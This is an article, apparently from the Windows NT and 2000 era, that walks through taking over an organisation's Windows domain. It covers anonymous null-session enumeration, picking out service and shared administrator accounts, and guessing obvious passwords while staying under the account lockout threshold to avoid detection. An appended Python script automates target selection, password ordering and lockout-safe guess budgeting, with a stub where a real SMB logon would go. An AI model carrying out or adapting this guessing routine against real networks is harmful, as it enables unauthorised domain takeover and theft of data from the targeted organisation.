The following attack can grant complete control of an organisation's Windows network in less than 20 minutes. As usual, it works thanks to a combination of ignorance and sloppiness (or lack of investment).

Plug a Windows laptop in anywhere on the organisation's network: at head office, at a branch office or store, anywhere on trusted third-party premises, or perhaps over a dial-up connection. Browse the network with Windows Explorer and you will see all the Windows machines on it; there is no need to log on or join a domain for this to happen.

Select a server (they are usually named in an obvious fashion) and attempt a "null session" connection. Null sessions are a standard feature of NT and Windows 2000 which let you list users, groups, group memberships and so on without any form of authentication whatsoever. (Anonymous enumeration can be restricted with the RestrictAnonymous LSA setting on NT 4.0 and Windows 2000, but it is not turned on by default.) And, yes, there is plenty of software on the Internet which will help you establish a null session and then interrogate this information; my personal favourite is Hyena, a tool designed for managing Windows networks.

Now list the users in the Administrators and Domain Admins groups and look for patterns, or rather for exceptions to a pattern. Organisations typically use obvious naming conventions for user accounts, but these are usually ignored where service accounts are concerned. (Service accounts are administrator-level accounts which let applications log on to servers and domains; Backup Exec, ARCserve and Tivoli are obvious examples.) Select each of these service accounts in turn and try to guess its password; it is not as hard as you might think. Frequently, network administrators will choose something obvious, such as a password identical to the account name! Be careful not to exceed the account lockout threshold, otherwise even the most harassed admin will guess something is up.

If these fail, try the accounts which look like shared administrator accounts or scripted accounts, such as Administrator, Install, AutoInstall or similar. At least fifty percent of the time you will gain Domain Admin access, allowing you to create your own administrator account, join the domain legitimately and help yourself to any information on any server.
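The selection and budgeting steps above (pick the accounts that break the naming convention, guess the obvious passwords, and stop short of the lockout threshold) are mechanical enough to script. The following Python is an added example written for this page, not code from the article or from Hyena. The group membership, the naming convention regex, the lockout threshold and the password store are all constructed; where a real tool would make an SMB logon attempt, `fake_authenticate` consults a dictionary, so the script runs offline and only models the logic.

```python
import re
from collections import Counter

# Constructed sample: Domain Admins membership as a null-session enumeration
# would return it.  The human accounts follow a first-initial.surname
# convention; the rest are the exceptions the article tells you to look for.
ENUMERATED_DOMAIN_ADMINS = [
    "j.smith", "a.khan", "m.brown", "s.okafor", "l.chen",
    "svc_backupexec", "arcserve", "tivoli", "Administrator", "Install",
]

# Hypothetical lockout policy as read from the domain's account policy.
LOCKOUT_THRESHOLD = 5   # bad attempts before lockout; 0 means no lockout


def naming_exceptions(accounts, convention=r"^[a-z]\.[a-z]+$"):
    """Return the accounts that do not fit the naming convention.

    `convention` is the regex you infer by eye from the bulk of the list
    (hypothetical here); whatever fails it is a candidate service, shared
    or scripted account.
    """
    pattern = re.compile(convention)
    return [a for a in accounts if not pattern.match(a)]


def candidate_passwords(account):
    """Obvious guesses for one account, most likely first.

    The article's observation is that the password is often the account
    name itself; the other variants are common admin habits.  Order matters
    because only the first few fit under the lockout budget.
    """
    base = account.lower()
    stripped = re.sub(r"^(svc|sa)[_-]", "", base)   # svc_backupexec -> backupexec
    guesses = [account, base, stripped, base.capitalize(),
               base + "1", base + "123", stripped + "1", "password", ""]
    seen, ordered = set(), []                       # de-duplicate, keep order
    for g in guesses:
        if g not in seen:
            seen.add(g)
            ordered.append(g)
    return ordered


def guess_plan(accounts, lockout_threshold):
    """Map each account to the guesses that are safe to try in one pass.

    With lockout enabled we stop one short of the threshold so the bad
    password counter never reaches it; with threshold 0 there is no lockout
    and every candidate may be tried.
    """
    budget = None if lockout_threshold <= 0 else lockout_threshold - 1
    return {a: candidate_passwords(a)[:budget] for a in accounts}


def run_plan(plan, authenticate):
    """Run a plan against authenticate(account, password) -> bool.

    Returns (compromised, attempts).  Guessing an account stops as soon as
    it succeeds, so its attempt count is the position of the right guess.
    """
    compromised, attempts = {}, Counter()
    for account, guesses in plan.items():
        for pw in guesses:
            attempts[account] += 1
            if authenticate(account, pw):
                compromised[account] = pw
                break
    return compromised, attempts


# Constructed stand-in for the domain controller: the passwords the admins
# actually set.  A real tool would attempt an SMB logon here instead.
FAKE_DOMAIN_PASSWORDS = {
    "svc_backupexec": "backupexec",    # account name minus the svc_ prefix
    "arcserve": "arcserve",            # same as the account name
    "tivoli": "T1v0l1!x9Q",            # not guessable from this list
    "Administrator": "Administrator",  # shared account, never changed
    "Install": "password",             # 5th candidate: outside a threshold-5 budget
}


def fake_authenticate(account, password):
    return FAKE_DOMAIN_PASSWORDS.get(account) == password


def demo(threshold=LOCKOUT_THRESHOLD):
    targets = naming_exceptions(ENUMERATED_DOMAIN_ADMINS)
    plan = guess_plan(targets, threshold)
    compromised, attempts = run_plan(plan, fake_authenticate)
    # The check the article warns about: no account may reach the threshold.
    locked_out = [a for a, n in attempts.items() if threshold and n >= threshold]
    return {"targets": targets, "compromised": compromised,
            "attempts": dict(attempts), "locked_out": locked_out}


if __name__ == "__main__":
    print(demo())
```

With the constructed data and a threshold of 5, three of the five non-conforming accounts fall to the first two guesses while `tivoli` and `Install` each absorb exactly four failed attempts and nobody is locked out; run `demo(0)` to see what the absence of a lockout policy buys an attacker, since `Install` then falls on the fifth guess. The generalisation beyond the text is only the explicit budget: stop at threshold minus one per account, and read that threshold from the domain's policy before the first guess rather than assuming it.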